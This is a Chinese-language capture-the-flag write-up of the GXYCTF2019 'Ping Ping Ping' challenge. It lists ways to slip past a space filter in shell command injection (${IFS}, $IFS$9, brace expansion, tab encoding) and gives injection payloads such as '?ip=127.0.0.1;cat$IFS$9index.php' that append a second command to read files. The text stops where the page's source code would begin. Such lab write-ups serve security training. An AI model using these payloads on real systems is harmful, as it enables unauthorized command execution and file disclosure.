[GXYCTF2019]Ping Ping Ping

[GXYCTF2019]Ping Ping Ping    （命令执行绕过总结）

题目泉源

收录于：BUUCTF　　GXYCTF2019
题目描述

提示较为明确，get方法传参127.0.0.1后效果如下

比力容易想到联合执行命令，先看有哪些文件

尝试直接读取flag.php

读取失败，对空格进行了过滤。
题解

以下内容参考文章：https://blog.csdn.net/vanarrow/article/details/108295481
对空格的绕过比力简单，在kali默认的shell中验证后得出，绕过可用以下方式

1. ${IFS}
2. ${IFS}$9        //这里$1到$9都可以
3. $IFS$1          //这里$1到$9都可以
4. <
5. <>
6. {cat,flag.php}  //用逗号实现了空格功能，需要用{}括起来
7. %20   (space)       //在shell中无法直接使用%20代替空格，但是在URL编码中可以尝试，tab同理
8. %09   (tab)
9. X=$'cat\x09./flag.php';$X       // \x09表示tab，也可以用\x20
10. X='cat\x09./flag.php';$X      

复制代码

内联执行：将反引号内命令的返回值（即输出值）作为整条命令的输入值
比方当命令为：

1. cat `ls`

复制代码

即cat读取当前目录下的全部文件

因此可以使用上面的绕过方法配合内联执行，比方：

1. cat$IFS`ls`
2. cat$IFS$9`ls`

复制代码

先读取一下index.php的源码

1. ?ip=127.0.0.1;cat$IFS$9index.php

复制代码

美化后代码如下
[code]